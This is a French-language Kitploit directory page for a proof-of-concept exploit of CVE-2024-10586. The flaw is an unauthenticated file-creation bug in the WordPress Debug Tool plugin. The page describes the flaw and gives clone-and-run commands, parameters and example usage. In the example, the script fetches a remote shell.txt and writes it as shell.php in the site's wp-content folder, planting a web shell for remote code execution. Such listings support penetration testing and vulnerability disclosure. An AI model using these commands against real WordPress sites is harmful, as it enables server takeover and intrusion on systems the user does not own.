Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nxploited/cve-2024-10586-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

Exploit de preuve de concept pour CVE-2024-10586 ciblant le plugin WordPress Debug Tool. Automatise le téléversement de fichiers arbitraire conduisant à une exécution de code à distance via des requêtes POST non authentifiées.

Voir le dépôt
10il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Informations sur la vulnérabilité

Description Le plugin Debug Tool pour WordPress est vulnérable à la création arbitraire de fichiers en raison d'un manque de vérification des capacités sur la fonction dbt_pull_image() et d'un manque de validation du type de fichier dans toutes les versions jusqu'à la version 2.2 incluse.
Cela permet à des attaquants non authentifiés de créer des fichiers arbitraires tels que des fichiers .php qui peuvent être exploités pour exécuter du code à distance.

ID CVE

CVE-2024-10586

Utilisation du script

Prérequis

  • Python 3.x installé sur votre système.
  • Installer les dépendances requises : pip install requests

Comment exécuter

  1. Clonez le dépôt depuis GitHub :
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. Exécutez le script avec la commande suivante : python CVE-2024-10586.py -u -r -p <Chemin du shell (optionnel)>

    Paramètres

  • -u, --url : L'URL de base du site WordPress (par exemple, http://example.com/wordpress).
  • -r, --remote : L'URL du fichier distant à utiliser comme source de la charge utile.
  • -p, --path : Optionnel. Le chemin où le shell sera enregistré. Par défaut : /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

Exemple de commande

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

Exemple d'utilisation

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

Avertissement

Ce script est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous avez explicitement l'autorisation de tester. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil.

Télécharger l’outil